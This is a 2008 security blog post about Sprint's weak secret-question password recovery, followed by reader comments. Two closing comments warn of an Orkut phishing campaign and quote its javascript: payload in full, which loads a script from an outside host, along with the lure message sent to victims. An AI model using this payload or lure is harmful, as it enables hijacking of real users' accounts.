Saturday, April 12, 2008

Hacking Sprint accounts online made easy

I’ve posted before about my disdain for password recovery systems that use Secret Questions. Secret Questions are just like another password, ugh, but based on your personal information. Not only that they are often easily broken. This post on Flawed Security Lets Sprint Accounts Get Easily Hijacked serves as a perfect example of Weak Password Recovery Validation. In this case all you need to hijack someone’s account was/is their “cellphone number, just a smidge about them, and have half a brain.” Then let the privacy invasion and fraudulent charges game begin! This reminds me of the Paris Hilton cell phone hack.

There’s a funny snippet at the bottom:

“Currently, we are not aware of any instances of fraud occurring through the question and answer scenario that you've described;”

And why would Sprint notice? In the logs it wouldn't look like some kind of whacked out XSS or SQLi attack, it’ll appear just like legit traffic, so no one is really going to notice anyway. If an account got hi-jacked what are the odds it would be chalked up to either the user giving up their password, choosing a weak one, sniffed by some form of malware, or whatever -- anything except the exploitation of a website vulnerability. For an attacker that’s the beauty of business logic flaws, chalk up another example to use in my presentations.

6 comments:

Michael Coates said...

I completely agree with you on this one. Password reminder systems tend to considerably undermine any security that the password itself had provided. Why try and brute force a complex password when you can just enter a basic piece of information about the person? It's much easier to guess a mascot or pet name anyway.

Similar post of mine on password reminder systems

Awesome AnDrEw said...

Again not a fool-proof method, but a lot of services ask you for up to five custom verification questions and answers, which are supplied when you first create an account. This really depends on what the user chooses to enter, however it is much less likely that someone would be able to supply a specific traumatic childhood event than it would for them to answer with your mother's name.

Jeremiah Grossman said...

Yah, that approach technically works, but then the pendulum swing the other way. Now this "service" has a lot more personal information about you that I'd prefer they didn't have. Basically I just given incorrect answers now and use those fields as passwords normally.

Awesome AnDrEw said...

Well that's why I said it wasn't fool-proof. A majority of users will think nothing of it, and will actually submit something personal in nature. A great example of what could be used however without worrying about giving away too much information would be something random and humorous such as a joke by comedian Eugene Mirman. "Now whenever I call they have to ask me what am I wearing, and I have to respond, 'I don't think that's appropriate!'"

Inno$ent said...

ORKUT is being hacked.....by a phishing link

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://9coupons.com/n.js';void(0)

This is just to alert everyone tht this is in the Wild!!!!.....further diggin' will be done................

I guess everyone will pop in....but here is the heads up!!!!

Inno$ent said...

It seems we've got filter here :-(! Anyways....The script file is located here.....
'http://9coupons.com/n.js'
------------------------
javascript:d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://9coupons.com/n.js';
void(0)
---------------------------
Is wht appears in the scraps and from a friend....so people would likely trust it and along with it the message nicely written:

Hey..One girl is written about u in her ABOUT ME..And ur photos also..
Clear ur address bar..copy paste.. Below Script To See This Person



The filter bypass on orkut could be seen on the above link by careful code eval I have provided....no time for much research coz its kinda late here in the Kingdom of Bahrain !...

Apologies if I have got the wrong blog....

-ShawnZ